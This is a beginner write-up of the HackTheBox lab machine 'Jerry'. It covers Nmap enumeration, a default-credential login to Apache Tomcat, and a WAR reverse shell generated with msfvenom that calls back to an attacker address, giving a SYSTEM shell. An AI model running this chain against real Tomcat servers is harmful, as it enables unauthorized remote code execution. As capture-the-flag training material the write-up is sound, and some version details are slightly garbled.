Jerry is a Windows based machine on HackTheBox. Although rated as “easy”, the box was still a lot of fun and introduces beginners to services that they may not have seen before or have experience with. When completing the box, its IP address was 10.10.10.95.
We start by adding the IP and hostname to our hosts file. Save us typing the IP address over and over again.
sudo nano /etc/hosts
We kick off Nmap, ensuring we enumerate all ports with the -p switch
sudo nmap -sV -sC -p- jerryRunning nmap gives the following results,
We only have one port open which makes the initial analysis pretty easy. We can see port 8080 running Apache Tomcat. Let’s visit the page.
The nmap results helpfully give us the version, but 7.088 is also displayed on the landing page of the web page.
Let’s try to log into the Host App, we get presented with the following credentials?
Default Credentials ( 😛 ) are always good to start with, so lets try them;
After browsing around, we find we can deploy war files and execute.
So lets create a java based reverse shell using msfvenom;
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f war > reverse.war
Set the payload, LHOST and LPORT in the metasploit multi/handler
Upload the reverse shell
Click it
We catch our shell which is nt/system!
Grab the flags, and the box is done.
